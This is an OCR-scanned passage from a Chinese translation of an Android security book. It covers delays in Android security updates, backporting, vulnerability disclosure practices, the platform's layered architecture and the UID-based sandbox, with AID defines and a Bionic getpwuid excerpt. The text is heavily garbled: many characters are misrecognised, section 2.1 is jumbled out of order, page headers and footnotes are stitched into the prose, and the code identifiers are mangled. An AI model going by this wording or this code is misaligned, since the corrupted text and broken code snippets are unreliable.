定 版 本 平台 的 API 不 被 修改 ,即使 经 过 厂商 的 修改 之 后 。 这 确保 了 无 论 是 谁 生产 的 设备 , 应 用 开 
发 者 都 拥有 一 致 的 开发 体验 。 

在 CTS 中 进行 的 测试 都 是 开源 的 ， 而 且 自 2011 年 5 月 以 来 一 直 在 不 停 地 发 展 。CTS 中 包含 
了 一 个 名 为 security 的 测试 目录 ， 该 目录 集中 了 对 安全 问题 的 测试 。 可 以 在 AOSP 主 代码 树 中 看 
到 当前 的 安全 测试 用 例 ， https://android.googlesource.com/platform/cts/+/master/tests/tests/security。 





























































































































































































































1.3.3 ”更 新 问题 


毫 无 疑问 ，Android 生态 圈 中 最 重要 的 复杂 性 问题 当 属 对 软件 更 新 ( 尤其 是 安全 补丁 ) 的 处 
理 。 由 于 受到 生态 圈 几 个 复杂 性 问题 的 影响 ， 这 一 问题 变 得 更 加 殊 手 。 其 中 包括 第 三 方 软件 、 
OEM 定制 、 移 动 通信 运营 商 参 与 、 不 同 的 代码 所 有 权 等 。 上 游 开 源 项 目 安 全 问题 、 部 署 操作 系 
统 更 新 的 技术 挑战 、 缺 少 后 向 移植 机 制 (back-porting ) 以 及 瓦解 的 联盟 等 问题 是 目前 的 焦点 。 整 
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体 而 言 ， 这 是 导致 目前 Android 生态 圈 中 存在 着 大 量 不 安全 设备 的 主要 原因 。 

1. 更 新 机 制 

这 个 问题 的 根源 在 于 Android 系统 中 存在 着 多 个 更 新 软件 的 渠道 。 更 新 应 用 与 更 新 操作 系统 
有 所 不 同 ， 应 用 开发 者 可 以 通过 Google Play 商店 来 部 署 对 应 用 安全 漏洞 的 更 新 补丁 一 无 论 这 
个 应 用 是 由 谷歌 、OEM 、 运 营 商 ， 还 是 由 独立 开发 者 编写 的 。 与 之 相反 ， 修 补 操作 系统 中 的 一 
个 安全 缺陷 则 需要 部 署 一 次 固件 升级 或 OTA 更 新 。 创 建 和 部 署 这 类 更 新 的 流程 其 为 艰巨。 

例如 ,考虑 在 核心 Android 操作 系统 中 修补 一 个 安全 缺陷 。 要 修补 这 一 安全 问题 ,首先 需要 
谷歌 修补 它 ， 然 后 事情 就 开始 变 得 棘手 ， 并 且 依赖 于 具体 设备 。 对 于 Nexus 设备 ,可 以 直接 将 更 
新 后 的 固件 推送 给 终端 用 户 。 然 而 ， 如 果 要 更 新 OEM 品牌 的 设备 ， 则 还 需要 OEM 开发 一 个 包 
含 谷歌 补丁 的 系统 版 本 。 当 然 ， 这 里 还 有 一 种 特殊 情况 ， 即 OEM 可 以 直接 把 更 新 后 的 固件 推送 
给 未 锁定 设备 的 终端 用 户 。 对 于 运营 商 补贴 的 设备 ， 运 营 商 必 须 先 准备 好 含有 补丁 的 定制 版 本 ， 
然后 分 发 给 它 的 客户 群 。 即 使 在 这 个 简单 的 例子 中 , 操作 系统 安全 漏洞 的 更 新 路 径 也 远 比 应 用 更 
新 复杂 。 此 外 ， 还 可 能 会 发 生 与 第 三 方 开发 者 或 底层 硬件 制造 商 相 关 的 其 他 问题 。 

2. 更 新 频率 

前 面 提 到 ，Android 新 版 本 的 推行 速度 相当 慢 。 事 实 上 ， 该 问题 已 经 好 几 次 激 起 公愤 。2013 
年 4 月， 美国 公民 自由 联盟 ( ACLU ) 向 美国 联邦 贸易 委员 会 (FTC ) 提起 投诉 ， 称 美国 的 四 家 
主要 移动 运营 商 并 没有 为 他 们 所 售 出 的 Android 智 能 手机 提供 及 时 的 安全 更 新 .他 们 进一步 指出 ， 
即便 谷歌 已 经 发 布 了 安全 漏洞 补丁 , 运营 商 仍然 没有 及 时 提供 安全 更 新 。 不 能 及 时 地 安装 安全 更 
新 ，Android 就 无 法 成 为 一 种 成 熟 且 安全 的 操作 系统 。 毫 无 疑问 ， 人 们 正在 期 待 政府 对 这 种 问题 
采取 一 定 的 行动 。 

漏洞 报告 、 补 丁 开发 和 补丁 实施 之 间 的 时 间 间 隔 也 很 长 。 漏洞 报告 和 补丁 开发 之 间 的 时 间 间 
隔 通 常 比较 短 ， 一 般 耗 时 几 天 或 几 周 。 然而， 从 补丁 开发 到 将 补丁 部 署 在 终端 用 户 设备 上 ， 整 
个 时 间 周 期 就 可 能 要 从 几 周 到 几 个 月 不 等 ,甚至 根本 就 不 会 有 补丁 实施 。 依 不 同 的 安全 漏洞 而 异 ， 
整个 修补 周期 会 涉及 生态 圈 中 多 方 利益 相关 者 。 泪 憾 的 是 , 终端 用 户 最 终 会 为 设备 上 所 存在 的 漏 
洞 埋单 。 

对 于 Android 生态 圈 中 所 有 的 安全 补丁 来 说 ,复杂 性 对 它们 的 影响 是 不 同 的 。 举 例 来 说 ， 应 
用 由 它们 的 作者 直接 更 新 。 应 用 开发 者 及 时 推出 更 新 的 能 力 使 过 去 几 个 安全 漏洞 得 以 快速 修复 。 
此 外 ,谷歌 也 证 明了 他 们 可 以 在 一 个 合理 的 时 间 段 内 为 Nexus 设备 部 署 固件 更 新 。 最 后 ,高 级 用 
户 有 时 会 自己 承担 风险 来 给 自己 的 设备 打 补 丁 。 

通常 ， 谷 歌会 在 发 现 漏洞 几 天 或 几 周 内 ， 即 开始 修补 AOSP 主 代码 树 中 的 安全 漏洞 。 在 这 之 
后 ，OEM 才 可 以 把 这 些 “补丁 ”应 用 到 其 内 部 代码 树 中 。 然 而 ，OEM 在 应 用 补丁 时 往往 动作 组 
慢 。 没有 贴 牌 的 设备 通常 会 比 运营 商 贴 牌 设备 更 快 得 到 更 新 , 因为 它们 无 须 经 过 运营 商定 制 和 运 
营 商 的 审批 程序 。 运 营 商 设备 通常 需要 几 个 月 才能 得 到 安全 更 新 ， 或 者 永远 也 得 不 到 更 新 。 

3. 后 向 移植 

术语 “后 向 移植 ” 指 的 是 将 当前 软件 版 本 的 补丁 应 用 至 一 个 较 旧 的 版 本 上 。 在 Android 生态 
圈 中 ， 对 安全 补丁 进行 后 向 移植 的 情况 几乎 不 存在 。 考 虑 这 样 一 个 假想 的 场景 ，Android 的 最 新 
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版 本 是 4.2; 如 果 一 个 安全 漏洞 被 发 现 影响 了 Android 4.0.4 及 以 后 版 本 , 谷歌 只 会 在 4.2.x 及 以 后 
版 本 中 修复 这 个 漏洞 ， 而 之 前 版 本 (如 4.0.4 和 4.1.x ) 的 用 户 肯 定 将 面临 长 期 的 安全 风险 。 我 们 
相信 ， 如 果 发 生 大 范围 的 攻击 事件 ， 可 以 对 安全 补丁 进行 后 向 移植 。 然 而 到 本 书写 作 之 时 ,还 没 
有 对 这 种 攻击 的 公开 报道 。 

4. Android 更 新 联盟 

2011 年 5 月 ， 在 Google IO 大 会 上 ，Android 的 产品 经 理 Hugo Barra 宣告 了 Android 更 新 联 
盟 的 成 立 。 这 一 举措 的 既定 目标 是 鼓励 合作 伙伴 们 作出 承诺 : 在 官方 版 本 发 布 后 18 个 月 内 更 新 
他 们 的 Android 设备 。 这 个 更 新 联盟 由 HITC LG \ 摩 托 罗 拉 三 星 、 索 尼 爱 立信 "AT&T、TMobile、 
Spint、 Verizon 和 Vodafone 公司 共同 创立 ,遗憾 的 是 ,在 这 次 声明 之 后 ,再 也 没有 人 提起 过 Android 
更 新 联盟 。 时 间 已 经 证 明 , 开发 新 的 固件 版 本 , 老 旧 设备 的 安全 问题 ， 最 新 发 布 硬件 所 带 来 的 问 
题 , 以 及 在 新 版 本 上 的 测试 与 开发 问题 等 , 都 对 及 时 更 新 版 本 造成 阻碍 。 对 那些 销售 不 好 的 设备 ， 
这 个 问题 会 特别 严重 ， 因 为 运营 商 和 制造 商 再 也 没有 动力 对 此 有 所 投入 。 

5. 更 新 的 依赖 关系 

紧 跟 上 游 的 开源 项 目 是 一 项 繁重 的 任务 ,在 Android 生态 圈 中 更 是 如 此 ， 因 为 补丁 的 生命 周 
期 拉 得 很 长 。 例如 ，Android 框架 层 中 包含 了 一 个 Web 浏览 器 引擎 WebKit, 好 几 个 其 他 项 目 也 都 
使 用 这 个 引擎 , 包括 谷歌 自己 的 Chrome 浏览 器 。Chrome 浏览 器 有 着 一 个 短 到 令 人 敬佩 的 补丁 生 
命 周期 ， 更 新 频率 大 概 保持 在 几 周 左右 。 与 Android 不 同 ，Chrome 浏览 器 还 有 一 个 非常 成 功 的 
安全 漏洞 奖励 计划 , 即 谷 歌会 在 每 次 更 新 补丁 时 对 安全 漏洞 的 发 现 者 进行 奖励 并 对 安全 漏洞 予以 
公开 披露 。 遗 憾 的 是 ， 在 Chrome 浏览 器 中 发 现 并 得 到 修补 的 安全 漏洞 很 多 依然 存在 于 Android 
代码 中 。 这 些 漏 洞 经 常 被 称 为 half-day 漏洞 。 这 个 术语 是 从 half-life (半衰期 ) 演变 而 来 的 ， 半 
豪 期 用 于 测量 放射 性 元 素 的 衰变 速度 。 类 似 地 ，half-day 漏洞 也 在 训 变 。 邻 人 痛心 的 是 ， 当 它 误 
变 时 ，Android 用 户 都 暴露 在 利用 这 类 漏洞 的 攻击 风险 中 。 


1.3.4 安全 性 与 开放 性 


Android 生态 圈 中 一 个 最 为 深刻 的 复杂 性 在 于 高 级 用 户 与 有 着 较 高 安全 意识 厂商 之 间 的 关 
系 ,高 级 用 户 想 要 并 且 需 要 不 受阻 但 地 访问 他 们 的 设备 。 第 3 章 会 讨论 这 些 用 户 动机 背后 的 理念 。 
与 此 相反 , 一 款 非 常安 全 的 设备 符合 供应 厂商 和 日 常 最 终 用户 的 最 大 利益 。 高 级 用 户 与 厂商 的 不 
同 需求 为 研究 者 提供 了 非常 有 趣 的 问题 。 

作为 所 有 高 级 用 户 的 一 个 子 集 , 安全 研究 人 员 面 临 着 更 具 挑 战 性 的 决定 。 当 研究 人 员 发 现 安 
全 问题 后 , 他们 必须 决定 如 何 处 理 这 些 信息 。 是 向 供应 商 报告 这 些 问 题 , 还 是 应 该 公开 披露 如 
果 研 究 人 员 报 告 了 问题 , 供应 商 进 行 了 修补 , 那 就 可 能 会 阻碍 高 级 用 户 获 得 他 们 所 期 望 的 完全 控 
制 权 。 最 终 ,每 个 研究 人 员 的 决定 是 由 各 自 的 动机 驱动 的 。 例 如 ， 当 存在 一 个 公开 可 行 的 能 够 获 
取 完 全 访问 权限 的 方法 时 , 研究 人 员 通 常会 隐瞒 这 种 安全 漏洞 。 这 么 做 可 以 确保 在 厂商 修补 已 披 





















































































































































































































































Q@2012 年 2 月 15 日 ,索尼 公司 全 数 收购 爱立信 公司 所 持 有 的 索尼 爱立信 股份 ， 并 将 索尼 爱立信 更 名 为 “索尼 移动 
通信 ”， 品 牌 改 为 “索尼 ”( Sony )。 编者 注 











16 第 1 章 纵 观 Android 生态 圈 











露 的 漏洞 后 ， 他 们 仍 能 进行 必要 的 访问 。 这 也 意味 着 ， 这 些 安全 问题 仍然 未 得 到 修补 ， 恶 意 攻 击 
者 仍 会 利用 这 些 漏洞 。 在 某 些 情况 下 , 人 研究 人 员 会 选择 公布 经 过 深度 混淆 的 漏洞 攻击 代码 , 这样 
让 广 商 难以 发 现 被 利用 的 安全 漏洞 , 而 高 级 用 户 也 可 以 更 长 时 间 地 使 用 这 些 漏洞 攻击 。 很 多 时 候 ， 
这 些 漏 洞 攻击 代码 中 使 用 的 安全 漏洞 只 有 在 对 设备 进行 物理 访问 时 有 用 , 这 也 有 助 于 平衡 两 大 利 
益 相关 者 群体 各 自 具 有 冲突 性 的 需求 。 

厂商 也 在 努力 地 在 安全 性 和 开放 性 之 间 寻 求 平衡 。 所 有 的 三 商都 希望 满足 客户 需求 。 前面 提 
到 过 ,厂商 修改 Android 是 为 了 取悦 用 户 ， 并 试图 差异 化 自己 的 产品 。Bug 可 能 会 在 这 个 过 程 中 
被 引入 ， 从 而 有 损 整 体 的 安全 性 。 广 商 必须 决定 是 否 作出 这 样 的 修改 。 另 外 , 厂商 在 卖 出 设备 后 
要 承担 设备 的 质保 。 然 而 高 级 用 户 的 修改 会 让 系统 变 得 不 稳定 ,从 而 导致 了 一 些 原 本 不 必要 的 技 
术 支 持 。 保持 技术 支持 的 低 成 本 以 及 防止 欺诈 性 的 保修 更 换 显然 更 符合 三 商 们 的 最 大 利益 。 为 了 
处 理 这 些 问题 ,厂商 采取 了 引导 加 载 程序 锁定 机 制 。 遗 憾 的 是 , 这 些 机 制 也 让 有 技术 能 力 的 高 级 
用 户 难以 修改 他 们 的 设备 。 出 于 妥协 , 许多 厂商 会 向 终端 用 户 提供 解锁 设备 的 方法 。 你 可 以 在 第 
3 章 中 阅读 到 更 多 有 关 的 方法 。 


1.3.5 ”公开 披露 


最 后 要 提 及 的 一 项 复杂 性 跟 安全 漏洞 的 公开 披露 或 声明 有 关 。 在 信息 安全 领域 , 这 些 公告 的 
作用 在 于 提醒 系统 管理 员 和 精明 的 消费 者 更 新 软件 以 消除 已 有 漏洞 。 有 几 个 指标 (包括 是 否 充 分 
参与 了 安全 漏洞 披露 过 程 ) 可 以 用 来 衡量 一 个 厂商 的 安全 成 熟 度 。 遗 憾 的 是 ， 这 样 的 披露 在 
Android 生态 圈 中 是 极其 罕见 的 。 这 里 我 们 记录 了 已 知 的 几 次 公开 披露 ， 并 探讨 如 此 发 生 的 可 能 
原因 。 

2008 年 ， 谷 歌 在 Google Groups 中 启用 了 android-security-announce 邮件 列表 ,但 很 遗憾 ， 这 
个 邮件 列表 仪 包含 一 个 介绍 列表 的 帖子 。 你 可 以 查看 这 个 帖子 ， 网 址 是 https://groups.google. 
com/d/msg/android-security-announce/aEba217U23A/vOyOlIbBxw8J。 在 这 个 帖子 发 布 之 后 , 甚至 没 
有 一 个 正式 的 官方 公告 。 于 是 ， 跟 踪 Android 安全 问题 的 唯一 方法 是 阅读 AOSP 的 修改 日 志 ， 跟 
踪 Gerrit 的 修改 记录 ， 或 者 从 Android 问题 跟踪 服务 磊 ( https://code.google.com/p/android/issues/list ) 
上 大 海 捞 针 。 这 些 方法 都 非常 消耗 时 间 ， 而 且 容 易 出 错 ， 因 此 不 太 可 能 成 为 安全 漏洞 评估 的 最 佳 
实践 。 

尽管 目前 尚 不 清楚 为 何 谷歌 没 能 坚持 发 布 安 全 性 公告 , 但 可 能 存在 以 下 几 个 原因 。 一 种 可 能 
性 是 担心 这 种 做 法 会 更 大 程度 地 暴露 Android 生态 圈 中 的 安全 漏洞 。 基 于 此 ， 可 能 谷歌 也 认为 公 
开 披露 已 修补 的 安全 漏洞 是 不 负责 任 的 。 但 是 许多 安全 专家 ( 包括 笔者 ) 都 认为 ,通过 这 种 途径 
披露 安全 漏洞 所 造成 的 危险 远 比 让 漏洞 自己 逐步 曝光 要 小 得 多 。 男 一 种 可 能 性 则 涉及 谷歌 与 设备 
制造 商 、 运 营 商 的 复杂 合作 关系 。 很 容易 理解 ,披露 一 个 仍然 在 业务 合作 伙伴 产品 中 存在 的 安全 
漏洞 ,可 能 会 被 视 为 不 友好 的 举动 。 如 果 是 这 种 情况 , 那 就 意味 着 谷歌 将 业务 关系 的 优先 级 摆 在 
了 公众 利益 之 上 。 

撤 开 谷歌 不 论 ， 很 少 有 厂商 会 对 安全 漏 ; 








































































































































































































同 进行 公开 披露 。 许 多 OEM 都 完全 避免 公开 披露 ， 
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甚至 回避 媒体 关于 热点 安全 漏洞 的 问 询 。 例 如 ，HTC 尽管 在 上 张贴 了 披露 政策 ,但 却 从 未 公开 披 
露 过 任何 安全 漏洞 。 在 少数 情况 下 , 运营 商会 提 到 在 他 们 的 更 新 中 包含 了 “重要 的 安全 补丁 "一 一 
他 们 几乎 不 会 引用 安全 问题 的 CVE (通用 漏洞 与 披露 ) 编号 。 

CVE 项 目 旨 在 创建 一 个 集中 的 、 标 准 化 的 安全 漏洞 跟踪 编号 。 安 全 专业 人 员 ， 特 别 是 安全 
漏洞 研究 专家 ， 会 使 用 这 些 编号 来 跟踪 软件 或 硬件 中 的 安全 问题 。 使 用 CVE 编号 极 大 地 提升 了 
跨越 组 织 边 界 识别 与 讨论 同一 个 安全 问题 的 能 力 。 接 受 CVE 项 目的 公司 通常 会 被 认为 是 非常 成 
熟 的 企业 ， 因 为 他 们 意识 到 了 在 产品 中 记录 和 分 类 安全 漏洞 的 必要 性 。 

在 利益 相关 者 中 的 厂商 这 一 边 , 已 经 有 一 家 公司 站 出 来 认真 地 对 安全 漏洞 进行 公开 披露 , 这 
就 是 高 通 公 司 。 高 通 公 司 通过 Code Aurora 论坛 公开 披露 漏洞 。 这 个 小 组 由 几 家 服务 移动 无 线 业 
界 的 厂商 联合 成 立 , 由 高 通 公司 运营 。Code Aurora 网 站 提供 了 安全 公告 页 面 (https:/www.codeaurora. 
org/projects/security-advisories )， 其 中 包含 了 关于 安全 问题 与 CVE 编号 的 详细 信息 。 这 种 安全 成 
熟 度 应 该 是 其 他 利益 相关 者 学 习 的 榜样 ， 这 样 才能 让 Android 生态 圈 的 整体 安全 性 得 到 提升 。 

总 体 而 言 ， 安 全 研究 人 员 是 Android 生态 圈 中 对 安全 漏洞 公开 披露 的 最 大 支持 者 。 尽 管 并 非 
所 有 研究 人 员 都 会 尽心 尽力 , 但 他 们 还 是 会 让 安全 问题 受到 所 有 其 他 利益 相关 者 的 关注 。 安 全 问 
题 的 披露 往往 是 由 独立 研究 人 员 或 安全 公司 操作 的 , 他 们 会 在 邮件 列表 、 安 全 会 议 或 其 他 公开 论 
坛 上 对 这 些 问 题 进 行 公开 披露 。 越 来 越 多 的 研究 人 员 正 在 与 厂商 一 方 的 利益 相关 者 协调 有 关 安 全 
漏洞 披露 的 事项 ， 意 图 能 在 不 知 不 觉 间 改善 Android 的 安全 性 。 
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在 本 章 中 ,你 看 到 了 Android 操作 系统 是 如 何 经 过 多 年 的 发 展 ， 由 零 开 始 逐 渐 征 服 移动 操作 
系统 市 场 的 。 本 章 介绍 了 Android 生态 圈 的 主要 利益 相关 者 , 解释 了 他 们 各 自 的 角色 及 参与 动机 。 
本 章 详细 介绍 了 困扰 Android 生态 圈 的 各 种 复杂 性 问题 , 以 及 它们 是 如 何 影 响 Android 安全 性 的 。 
有 了 对 Android 生态 圈 复 杂 性 的 深刻 理解 ， 你 就 可 以 很 容易 地 找 出 关键 问题 领域 ， 进 而 更 有 效 地 
致力 于 解决 Android 安全 性 问题 。 

下 一 章 将 概述 Android 的 安全 设计 与 架构 ， 揭 开 Android 工作 原理 以 及 实施 安全 机 制 的 技术 
内 幕 。 
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Android 的 安全 1 


& 计 与 架构 








Android 系统 由 许多 承担 安全 检查 与 策略 执行 任务 的 机 制 构成 。 与 任何 现代 操作 系统 一 








样 ， 





Android 中 的 这 些 安全 机 制 互 相交 互 ， 








尔 也 会 
Android 平 台 的 整体 攻击 面 打 好 基础 。 


2.1 理解 Android 系统 


备 ) 以 及 将 要 执行 操作 ( 读 、 写 、 删 除 等 ) 的 各 种 信 |, 








交换 关于 主体 ( 应用、 用 户 )、 客 体 ( 其 他 应 用 、 文 件 和 设 
息 。 安 全 策略 执行 通常 不 会 发 生 故障 , 但 偶 


Co 











出 现 一 些 裂缝 ， 为 滥用 提供 了 机 会 。 本 童 将 讨论 Android 系统 的 安全 设计 与 架构 ， 为 分 析 


架构 


Android 的 总 体 架构 有 时 被 描述 为 “运行 在 Linux 上 的 Java”， 然 而 这 种 说 法 不 够 准确 ， 并 不 
能 完全 体现 出 这 一 平台 的 复杂 性 和 架构 。Android 的 总 体 架 构 由 5 个 主要 层次 上 的 组 件 构成 ， 这 


5 层 是 : Android 应 用 层 、Android 框架 








R 层 、Dalvik 虚拟 机 层 、 用 户 空间 原生 代码 层 和 Linux 内 核 


层 。 图 2-1 显示 了 这 些 层 是 如 何 构 成 Android 软件 栈 的 。 
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图 2-1 Android 系统 的 总 体 架 构 
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Android 应 用 层 允 许 开 发 者 无 须 修 改 底层 代码 就 对 设备 的 功能 进行 扩展 和 提升 ， 而 Android 
框架 层 则 为 开发 者 提供 了 大 量 的 用 来 访问 Android 设备 各 种 必需 设备 的 API， 也 就 是 充当 应 用 层 
与 Dalvik 虚拟 机 〈DalvikVM ) 层 之 间 的 “ 粘 合 剂 ?。API 中 包含 各 种 构件 (building block ) 以 允 
许 开 发 者 执行 通用 任务 ， 比 如 管理 UI 元 素 、 访 问 共享 数据 存储 ， 以 及 在 应 用 组 件 间 传递 信息 等 。 

Android 应 用 和 Android 框架 都 是 用 Java 语言 开发 的 , 并 在 DalvikVM 中 运行 。DalvikVM 的 
作用 主要 是 为 底层 操作 系统 提供 一 个 高 效 的 抽象 层 。DalvikVM 是 一 种 基于 寄存 器 的 虚拟 机 ， 能 
够 解释 执行 Dalvik 可 执行 格式 (DEX ) 的 字 节 码 ; 另 一 方面 ，DalvikVM 依赖 于 一 些 由 支持 性 原 
生 代码 程序 库 所 提供 的 功能 。 

Android 系统 中 的 用 户 空间 原生 代码 组 件 包括 系 统 服 务 ( 如 vold 和 DBus )、 网 络 服务 ( 如 dhcpd 
和 wpa_supplicant ) 和 程序 库 ( 如 bionic libc 、WebKit 和 OpenSSL )。 其 中 一 些 服 务 和 程序 库 会 与 
内 核 级 的 服务 与 驱动 进行 交互 ， 而 其 他 的 则 只 是 便利 底层 原生 操作 管理 代码 。 

Android 的 底层 基础 是 Linux 内 核 ，Android 对 内 核 源码 树 作 了 大 量 的 增加 与 修改 , 其 中 有 些 
代码 存在 一 些 独特 的 安全 后 果 。 我 们 会 在 第 3 章 、 第 10 章 和 第 12 章 中 更 加 详细 地 讨论 这 些 话题 。 
内 核 级 驱动 也 提供 了 额外 的 功能 ， 比 如 访问 照相 机 、Wi-Fi 以 及 其 他 网 络 设备 。 需 要 特别 注意 
Binder 驱动 ， 它 实现 了 进程 间 通 信 (IPC ) 机 制 。 

2.3 节 将 详细 介绍 每 一 层 上 的 关键 组 件 。 


2.2 理解 安全 边 弄 和 安全 策略 执行 


安全 边界 ， 有 时 也 会 称 为 信任 边界 ,是 系统 中 分 隔 不 同 信任 级 别 的 特殊 区 域 。 一 个 最 直接 的 
例子 就 是 内 核 空间 与 用 户 空间 之 间 的 边界 。 内 核 空间 中 的 代码 可 以 对 硬件 执行 一 些 底 层 操作 并 访 
问 所 有 的 虚拟 和 物理 内 存 , 而 用 户 空间 中 的 代码 则 由 于 CPU 的 安全 边界 控制 ,无 法 访问 所 有 内 存 。 

Android 操作 系统 应 用 了 两 套 独 立 但 又 相互 配合 的 权限 模型 。 在 底层 , Linux 内 核 使 用 用 户 和 
用 户 组 来 实施 权限 控制 ， 这 套 权 限 模型 是 从 Linux 继承 过 来 的 , 用 于 对 文件 系统 实体 进行 访问 控 
制 , 也 可 以 对 其 他 Android 特定 资源 进行 控制 。 这 一 模型 通常 被 称 为 Android 沙 箱 。 以 DalvikVM 
和 Android 框架 形式 存在 的 Android 运行 时 实施 了 第 二 套 权 限 模型 。 这 套 模型 在 用 户 安装 应 用 时 
是 向 用 户 公 开 的 ， 定 义 了 应 用 拥有 的 权限 ， 从 而 限制 Android 应 用 的 能 力 。 事 实 上 ， 第 二 套 权 限 
模型 中 的 某 些 权限 直接 映射 到 底层 操作 系统 上 的 特定 用 户 、 用 户 组 和 权能 (Capability )。 





















































































































































2.2.1 Android 沙 箱 


Android 从 其 根基 Linux 继承 了 已 经 深入 人 心 的 类 Unix 进程 隔离 机 制 与 最 小 权限 原则 。 具体 
而 言 , 进程 以 隔离 的 用 户 环境 运行 , 不 能 相互 干扰 ,比如 发 送信 号 或 者 访问 其 他 进程 的 内 存 空 间 。 
因此 ，Android 沙 箱 的 核心 机 制 基于 以 下 几 个 概念 : 标准 的 Linux 进程 隔离 、 大 多 数 进程 拥有 唯 
一 的 用 户 ID( UID )， 以 及 严格 限制 文件 系统 权限 。 

Android 系统 沿用 了 Linux 的 UID/GID (用户 组 ID ) 权限 模型 ,但 并 没有 使 用 传统 的 passwd 
和 group 文件 来 存储 用 户 与 用 户 组 的 认证 凭据 ， 作 为 在 代 ，Android 定义 了 从 名 称 到 独特 标识 符 
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Android ID( AID ) 的 映射 表 。 初 始 的 AID 映射 表 包 含 了 一 些 与 特权 用 户 及 系统 关键 用 户 ( 如 system 
用 户 / 用 户 组 ) 对 应 的 静态 保留 条 目 。Android 还 保留 了 一 段 AID 范围 , 用 于 提供 原生 应 用 的 UID。 
Android4.1 之 后 的 版 本 为 多 用 户 资 料 档 案 和 隔离 进程 用 户 增加 了 额外 的 AID 范围 段 (如 Chrome 
沙 箱 )。 你 可 以 从 AOSP 树 的 system/core/include/private/android filesystem _config.h 文件 中 找到 
AID 的 定义 。 以 下 是 一 个 简化 过 的 示例 。 


#define AID _ ROOT 0 /* 传 统 的 unix 根 用 户 */ 














#define AID_SYSTEM 1000 /* 系 统 服 务 器 */ 


#define AID_ RADIO 1001 /* 通 话 功 能 子 系 统 ，RIL*/ 
#define AID_BLUETOOTH 1002 /* 蓝 牙 子 系统 */ 


#define AID_SHELL 2000 /*adb shell 与 debug shell 用 户 */ 


#define AID_CACHE 2001 /* 缓 存 访 问 */ 
#define AID_DIAG 2002 /* 访 问 诊 断 资 源 */ 


/* 编 号 3000 系列 只 用 于 辅助 用 户 组 们 ， 表 示 出 了 内 核 所 支持 的 Rndroid 权能 */ 
#define AID_NET_BT _ADMIN 3001 /* 蓝 牙 : 创建 套 接 字 */ 


#define AID_NET_BT 3002 /* 蓝 牙 : 创建 sco、rfcomm 或 12cap 套 接 字 */ 
#define AID_INET 3003 /* 能 够 创建 AF_INET 和 AF_INET6 套 接 字 */ 
#define AID_NET_RAW 3004 /* 能 够 创建 原始 的 INET 套 接 字 */ 

#define AID_APP 10000 /* 第 一 个 应 用 用 户 */ 


#define AID_ISOLATED_START 99000 /* 完 全 隔绝 的 沙 箱 进程 中 UID 的 开始 编号 */ 
#define AID_ISOLATED_END ”99999 /* 完 全 隔绝 的 沙 箱 进程 中 UID 的 末尾 编号 */ 
#define AID_USER 100000 /* 每 一 用 户 的 UID 编号 范围 偏 移 */ 


除了 AID,， Android 还 使 用 了 辅助 用 户 组 机 制 , 以 允许 进程 访问 共享 或 受 保护 的 资源 。 例如， 
sdcargd_rw 用 户 组 中 的 成 员 允 许 进程 读 写 /sdcard 目录 ， 因 为 它 的 加 载 项 规定 了 哪些 用 户 组 可 以 
读 写 该 目录 。 这 与 许多 Linux 发 行 版 中 对 辅助 用 户 组 机 制 的 使 用 是 类 似 的 。 















































注意 尽管 所 有 的 AID 条 目 都 映射 到 一 个 UID 和 GID ,但 是 UID 在 描述 系统 上 的 一 个 用 户 时 并 
不 是 必需 的 。 例 如 ，AID_SDCARD_RW 映射 到 sdqcarq_rw， 但 是 它 仅仅 用 作 一 个 辅助 用 
户 组 ， 而 不 是 系统 上 的 UID。 








除了 用 来 实施 文件 系统 访问 ， 辅 助 用 户 组 还 会 被 用 于 向 进程 授予 额外 的 权限 。 例 如 ， 
AID_INET 用 户 组 允许 用 户 打 开 AF_INET 和 AF_INET6 套 接 字 。 在 某 些 情况 下 ， 权 限 也 可 能 以 
Linux 权能 的 形式 出 现 ， 例 如 ，AID_INET_ADMIN 用 户 组 中 的 成 员 授予 cAP_NET_ADMIN 权能 ， 
人 允许 用 户 配置 网 络 接口 和 路 由 表 。 本 节 最 后 还 会 介绍 与 网 络 相关 的 其 他 相似 用 户 组 。 

在 4.3 及 之 后 的 版 本 中 ，Android 提升 了 对 Linux 权能 的 使 用 ， 比 如 Android 4.3 将 二 进 制 程 
序 /system/bin/mrun-as 从 原先 设置 成 set-UID root 权限 ,修改 为 使 用 Linux 权能 来 访问 特权 资源 。 在 
这 里 ， 这 一 权能 方便 了 对 packages.list 文件 的 访问 。 
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注意 对 Linux 权能 的 完整 讨论 已 经 超出 了 本 章 的 范围 。 你 可 以 分 别 从 Linux 内 核 的 
Documentation/security/credentials.txt 文档 和 capabilities 的 用 户 手 册页 面 获得 更 多 关于 
Linux 进程 安全 和 Linux 权能 的 信息 。 





在 应 用 执行 时 ， 它 们 的 UID、GID 和 辅助 用 户 组 都 会 被 分 配给 新 创建 的 进程 。 在 一 个 独特 
UID 和 GID 环境 下 运行 ， 使 得 操作 系统 可 以 在 内 核 中 实施 底层 的 限制 措施 ， 也 让 运行 环境 能 够 
控制 应 用 之 间 的 交互 。 这 就 是 Android 沙 箱 的 关键 所 在 。 

下 面 的 代码 给 出 了 在 一 台 HTC One V 手机 上 运行 ps 命令 后 的 输出 结果 , 注意 , 最 左 侧 显示 
的 UID 对 于 每 个 应 用 的 进程 都 是 独特 的 。 


app 16 4089 1451 304080 31724 ... 
app_35 4119 1451 309712 30164 ... 
app_155 4145 ©1451 318276 39096 ... 
app_24 4159 1451 307736 32920 ... 
app_151 4247 1451 303172 28032 ... 
app_49 4260 1451 303696 28132 ... 
app_13 4277 1451 453248 68260 





























com.htc.bgp 
com.google.android.calendar 
com.google.android.apps.plus 
android.process.media 
com.htc.lockscreen 
com.htc.weather.bg 
com.android.browser 


通过 使 用 应 用 包 中 的 一 种 特殊 指令 ， 应 用 也 可 以 共享 UI 这 一 点 我 们 会 在 2.3.1 节 详 细 讨论 。 

实际 上 ， 进 程 显示 的 用 户 与 用 户 组 名 称 是 由 一 种 POSIX a Android 专 有 实现 所 提供 的 ， 
这 种 函数 通常 就 是 用 来 设置 和 获取 这 些 值 的 。 例 如 ， 考 虑 在 Bionic 库 的 stubs.cpp 文件 中 定义 的 
getpwuigd 困 数 。 


moonoono on o 
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345 passwd* getpwuid(uiqd_t uid) { // NOLINT :实现 不 良 马 数 


346 stubs_state_t* State = _ Stupbs_state():， 
347 if (state == NULL) { 

348 return NULL; 

349 } 

350 


35 江 passwd* pw = androiqd iqd to passwd(state, uid); 
352 if (pw != NULL) { 


353 return pw; 

354 } 

359 return app_id to passwd (uid, state); 
356- 


与 它 的 同胞 函数 一 样 ，getpwuig 也 数 会 调用 一 些 额外 的 Android 专 有 子 数 ， 如 
